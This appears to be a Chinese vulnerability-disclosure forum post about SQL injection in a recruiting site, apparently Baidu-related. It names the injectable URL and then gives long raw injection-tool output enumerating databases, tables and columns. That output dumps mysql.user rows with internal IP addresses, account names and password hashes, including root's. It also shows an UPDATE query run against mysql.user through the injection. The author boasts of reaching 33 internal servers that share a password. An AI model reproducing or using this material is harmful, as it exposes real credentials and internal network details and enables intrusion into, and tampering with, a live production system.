2012-05-31: 细节已通知厂商并且等待厂商处理中 2012-05-31: 厂商已经确认,细节仅向厂商公开 2012-06-10: 细节向核心白帽子及相关领域专家公开 2012-06-20: 细节向普通白帽子公开 2012-06-30: 细节向实习白帽子公开 2012-07-15: 细节向公众公开
百度某站存在安全隐患,可渗透致内网拿下33台服务器。为了保护这个站,肯定是不能说的。哎,36台服务器的,除去本机的,就是33台内网服务器的。口令就不说了。权限的话就不说了,跑表都跑死人。方向木有泄露出的。伤不起啊,伤不起。由于某个注入引发的血案啊,血案啊。想知道是为什么呢?请等待公开吧,亲。俺们希望这个能加个精,20分我是要定了。喜欢就多多顶贴吧,多多支持。
血案凶手:http://www.baijob.com/p/Searchcompany/industry?id=9&parent_id=1
Analyzing http://www.baijob.com/p/Searchcompany/industry?id=9&parent_id=1Host IP: 58.68.231.87Web Server: ApachePowered-by: PHP/5.3.10Keyword Found: ApplicationInjection type is IntegerCan't find db server type! But maybe there be some chances! [-o<Selected Column Count is 2Valid String Column is 2DB Server: MySQLCurrent DB: sr_spiderCount(table_name) of information_schema.tables where table_schema=0x73725F737069646572 is 1854Tables found: bi_test,bi_test_sr_entity,company,company_detail,e_p_config,e_perm,e_project,e_r_p_map,e_role,e_u_company,e_u_p_map,e_u_r_map,import_data_log,job,job_profession_info,model_sample,rc_tags,rc_tags_relation,search_ratings,sr_address,sr_base,sr_base_bak,sr_base_dict,sr_base_property,sr_company_search,sr_company_spider,sr_data_trans_log,sr_data_trans_log_20120419,sr_def_base_mapping,sr_entity,sr_entity_md5,sr_entity_resume,sr_fetch_website,sr_field_data_1,sr_field_data_10,sr_field_data_100,sr_field_data_1000,sr_field_data_101,sr_field_data_102,sr_field_data_103,sr_field_data_104,sr_field_data_105,sr_field_data_106,sr_field_data_107,sr_field_data_108,sr_field_data_109,sr_field_data_11,sr_field_data_110,sr_field_data_111,sr_field_data_112,sr_field_data_113,sr_field_data_114,sr_field_data_115,sr_field_data_116,sr_field_data_117,sr_field_data_118,sr_field_data_119,sr_field_data_12,sr_field_data_120,sr_field_data_121,sr_field_data_122,sr_field_data_123,sr_field_data_124,sr_field_data_125,sr_field_data_126,sr_field_dataCan not get all tables by group_concat!Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x62695F74657374 is 6Column found: idColumn found: urlColumn found: visit_timeColumn found: ipCanceling...Column found: tsJob Canceled!Data Base Found: information_schemaData Base Found: joblogData Base Found: mysqlData Base Found: sr_campusData Base Found: sr_commonsData Base Found: sr_companyData Base Found: sr_resumeData Base Found: sr_spiderCount(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x655F705F636F6E666967 is 16Column found: IDColumn found: Project_IDColumn found: ReroleColumn found: RelogoColumn found: ReoneurlColumn found: ReurlColumn found: ReitemColumn found: LoginlogoCanceling...Column found: LoginurlJob Canceled!Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x696D706F72745F646174615F6C6F67 is 3Column found: idColumn found: descColumn found: typeCount(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x6A6F62 is 45Column found: idColumn found: company_idColumn found: company_admin_idColumn found: job_titleColumn found: job_codeColumn found: emailColumn found: send_flagColumn found: addressColumn found: numberColumn found: typeColumn found: salaryColumn found: ageColumn found: educationColumn found: language1Column found: language1_valueColumn found: language2Column found: language2_valueColumn found: major1Column found: major2Column found: work_typeColumn found: work_yearColumn found: description_cnColumn found: description_enColumn found: auto_reply_flagColumn found: auto_reply_contentColumn found: intimeColumn found: endtimeColumn found: freshtimeColumn found: statusColumn found: import_flagColumn found: import_urlColumn found: pass_flagColumn found: department_idColumn found: salary_show_discussColumn found: order_seqColumn found: apply_numColumn found: email_model_idColumn found: modify_timeColumn found: workplaceColumn found: profession_typeColumn found: major_txtColumn found: resourceColumn found: create_timeColumn found: pause_timeColumn found: tsCount(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x6A6F625F70726F66657373696F6E5F696E666F is 8Column found: level1Column found: level1_nameColumn found: level2Column found: level2_nameColumn found: profession_type_idColumn found: profession_typeColumn found: job_titleColumn found: idCount(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x73725F6669656C645F646174615F313136 is 11Column found: idColumn found: entity_idColumn found: field_idColumn found: field_original_valueColumn found: field_valueColumn found: field_standard_valueColumn found: Schema_idColumn found: InspectionColumn found: STATUSColumn found: User_idColumn found: system_idCount(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x73725F6669656C645F646174615F313137 is 11Column found: idColumn found: entity_idColumn found: field_idColumn found: field_original_valueColumn found: field_valueColumn found: field_standard_valueColumn found: Schema_idColumn found: InspectionColumn found: STATUSColumn found: User_idColumn found: system_idCount(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x73725F6669656C645F646174615F313138 is 11Column found: idColumn found: entity_idColumn found: field_idColumn found: field_original_valueColumn found: field_valueColumn found: field_standard_valueColumn found: Schema_idColumn found: InspectionColumn found: STATUSColumn found: User_idColumn found: system_idCount(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x73725F6669656C645F646174615F313139 is 11Column found: idCanceling...Column found: entity_idJob Canceled!Count(table_name) of information_schema.tables where table_schema=0x6D7973716C is 23Table found: columns_privTable found: dbTable found: eventTable found: funcTable found: general_logTable found: help_categoryTable found: help_keywordTable found: help_relationTable found: help_topicTable found: hostTable found: ndb_binlog_indexTable found: pluginTable found: procTable found: procs_privTable found: serversTable found: slow_logTable found: tables_privTable found: time_zoneTable found: time_zone_leap_secondTable found: time_zone_nameTable found: time_zone_transitionTable found: time_zone_transition_typeTable found: userCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x636F6C756D6E735F70726976 is 7Column found: HostColumn found: DbColumn found: UserColumn found: Table_nameColumn found: Column_nameColumn found: TimestampColumn found: Column_privCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x6462 is 22Column found: HostColumn found: DbColumn found: UserColumn found: Select_privColumn found: Insert_privColumn found: Update_privColumn found: Delete_privColumn found: Create_privColumn found: Drop_privColumn found: Grant_privColumn found: References_privColumn found: Index_privColumn found: Alter_privColumn found: Create_tmp_table_privColumn found: Lock_tables_privColumn found: Create_view_privColumn found: Show_view_privColumn found: Create_routine_privColumn found: Alter_routine_privColumn found: Execute_privColumn found: Event_privColumn found: Trigger_privCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x6576656E74 is 22Column found: dbColumn found: nameColumn found: bodyColumn found: definerColumn found: execute_atColumn found: interval_valueColumn found: interval_fieldColumn found: createdColumn found: modifiedColumn found: last_executedColumn found: startsColumn found: endsColumn found: statusColumn found: on_completionColumn found: sql_modeColumn found: commentColumn found: originatorColumn found: time_zoneColumn found: character_set_clientColumn found: collation_connectionColumn found: db_collationColumn found: body_utf8Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x66756E63 is 4Column found: nameColumn found: retColumn found: dlColumn found: typeCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x67656E6572616C5F6C6F67 is 6Column found: event_timeColumn found: user_hostColumn found: thread_idColumn found: server_idColumn found: command_typeColumn found: argumentCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x68656C705F63617465676F7279 is 4Column found: help_category_idColumn found: nameColumn found: parent_category_idColumn found: urlCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x68656C705F6B6579776F7264 is 2Column found: help_keyword_idColumn found: nameCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x68656C705F72656C6174696F6E is 2Column found: help_topic_idColumn found: help_keyword_idCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x68656C705F746F706963 is 6Column found: help_topic_idColumn found: nameColumn found: help_category_idColumn found: descriptionColumn found: exampleColumn found: urlCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x686F7374 is 20Column found: HostColumn found: DbColumn found: Select_privColumn found: Insert_privColumn found: Update_privColumn found: Delete_privColumn found: Create_privColumn found: Drop_privColumn found: Grant_privColumn found: References_privColumn found: Index_privColumn found: Alter_privColumn found: Create_tmp_table_privColumn found: Lock_tables_privColumn found: Create_view_privColumn found: Show_view_privColumn found: Create_routine_privColumn found: Alter_routine_privColumn found: Execute_privColumn found: Trigger_privCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x6E64625F62696E6C6F675F696E646578 is 7Column found: PositionColumn found: FileColumn found: epochColumn found: insertsColumn found: updatesColumn found: deletesColumn found: schemaopsCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x706C7567696E is 2Column found: nameColumn found: dlCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x70726F63 is 20Column found: dbColumn found: nameColumn found: typeColumn found: specific_nameColumn found: languageColumn found: sql_data_accessColumn found: is_deterministicColumn found: security_typeColumn found: param_listColumn found: returnsColumn found: bodyColumn found: definerColumn found: createdColumn found: modifiedColumn found: sql_modeColumn found: commentColumn found: character_set_clientColumn found: collation_connectionColumn found: db_collationColumn found: body_utf8Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x70726F63735F70726976 is 8Column found: HostColumn found: DbColumn found: UserColumn found: Routine_nameColumn found: Routine_typeColumn found: GrantorColumn found: Proc_privColumn found: TimestampCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x73657276657273 is 9Column found: Server_nameColumn found: HostColumn found: DbColumn found: UsernameColumn found: PasswordColumn found: PortColumn found: SocketColumn found: WrapperColumn found: OwnerCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x736C6F775F6C6F67 is 11Column found: start_timeColumn found: user_hostColumn found: query_timeColumn found: lock_timeColumn found: rows_sentColumn found: rows_examinedColumn found: dbColumn found: last_insert_idColumn found: insert_idColumn found: server_idColumn found: sql_textCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x7461626C65735F70726976 is 8Column found: HostColumn found: DbColumn found: UserColumn found: Table_nameColumn found: GrantorColumn found: TimestampColumn found: Table_privColumn found: Column_privCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E65 is 2Column found: Time_zone_idColumn found: Use_leap_secondsCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E655F6C6561705F7365636F6E64 is 2Column found: Transition_timeColumn found: CorrectionCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E655F6E616D65 is 2Column found: NameColumn found: Time_zone_idCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E655F7472616E736974696F6E is 3Column found: Time_zone_idColumn found: Transition_timeColumn found: Transition_type_idCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E655F7472616E736974696F6E5F74797065 is 5Column found: Time_zone_idColumn found: Transition_type_idColumn found: OffsetColumn found: Is_DSTColumn found: AbbreviationCount(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x75736572 is 39Column found: HostColumn found: UserColumn found: PasswordColumn found: Select_privColumn found: Insert_privColumn found: Update_privColumn found: Delete_privColumn found: Create_privColumn found: Drop_privColumn found: Reload_privColumn found: Shutdown_privColumn found: Process_privColumn found: File_privColumn found: Grant_privColumn found: References_privColumn found: Index_privColumn found: Alter_privColumn found: Show_db_privColumn found: Super_privCanceling...Column found: Create_tmp_table_privJob Canceled!Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x75736572 is 39Column found: HostColumn found: UserColumn found: PasswordColumn found: Select_privColumn found: Insert_privColumn found: Update_privColumn found: Delete_privCanceling...Column found: Create_privJob Canceled!Count(*) of mysql.user is 36Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=NData Found: User=bi_selectData Found: Host=10.30.20.30Data Found: Password=*1E8BCA2F8283E302C66EEE85CA4544162AD58EC0Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.20.10.54Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.72Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.73Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.20.10.84Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.93Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.94Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.20.10.56Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.20.10.57Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=cactiuserData Found: Host=10.20.10.26Data Found: Password=*02C40237B6A2F896C7CB8F5725BEB9C721987587Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.222Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.106Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.107Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.91Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.51Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.52Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.224Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.20.10.53Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.27Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=NTurning off 'bypass illegal union' and retrying!Data Found: User=Data Found: Host=db1.search.cn2Turning on 'bypass illegal union' and retrying!Data Found: Password=Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=NData Found: User=sespiderData Found: Host=10.30.10.22Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.32Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=NData Found: User=sespiderData Found: Host=10.30.10.40Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=NData Found: User=sespiderData Found: Host=10.30.10.41Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=NData Found: User=sespiderData Found: Host=10.30.10.42Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.43Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=NData Found: User=sespiderData Found: Host=10.30.10.47Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.20.10.59Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=khdtestselectData Found: Host=10.20.20.20Data Found: Password=*D6A60A2C4BD4D834EC8C3D83F8A72AE8BD207CE8Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.45Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.44Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.49Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=NData Found: Update_priv=NData Found: Select_priv=YData Found: User=sespiderData Found: Host=10.30.10.48Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89Data Found: Delete_priv=YData Found: Update_priv=YData Found: Select_priv=YData Found: User=rootData Found: Host=127.0.0.1Data Found: Password=*60EED9B438C83464F8298E48B216C453D1EAEDC1Data Found: Delete_priv=YData Found: Update_priv=YData Found: Select_priv=YData Found: User=rootData Found: Host=db1.search.cn2Turning off 'bypass illegal union' and retrying!Data Found: Password=Data Found: Delete_priv=YData Found: Update_priv=YData Found: Select_priv=YData Found: User=rootData Found: Host=localhostData Found: Password=*60EED9B438C83464F8298E48B216C453D1EAEDC1Query: UPDATE mysql.user SET Host='' where Delete_priv='N' and Update_priv='N' and Select_priv='Y' and User='sespider' and Host='10.30.10.49' and Password='*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89'
以上昨晚我数的是33台内网服务器,就这样暴漏了。哎,而且服务器的口令大部分都是同一个,悲剧哥啊,
Count(*) of information_schema.USER_PRIVILEGES is 88Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.43'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=USAGETurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='bi_select'@'10.30.20.30'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.20.10.56'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='cactiuser'@'10.20.10.26'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.51'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.44'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.47'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='cactiuser'@'10.20.10.26'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.42'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.52'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.20.10.57'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.73'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.91'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.49'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='cactiuser'@'10.20.10.26'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.41'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.20.10.54'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.20.10.59'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.93'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=USAGETurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.22'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.48'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='cactiuser'@'10.20.10.26'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=USAGETurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.40'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.224'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.42'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.20.10.84'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.106'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.47'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.41'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.20.10.54'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.52'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.45'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.20.10.54'Data Found: IS_GRANTABLE=NOData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='sespider'@'10.30.10.222'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=SELECTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=EVENTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=SHUTDOWNTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=RELOADTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=REPLICATION SLAVETurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=SELECTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=FILETurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=RELOADTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=REPLICATION SLAVETurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=SHOW DATABASESTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=CREATE ROUTINETurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=CREATETurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=REPLICATION CLIENTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=PROCESSTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=CREATE ROUTINETurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=DROPTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=TRIGGERTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=PROCESSTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=DELETETurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: 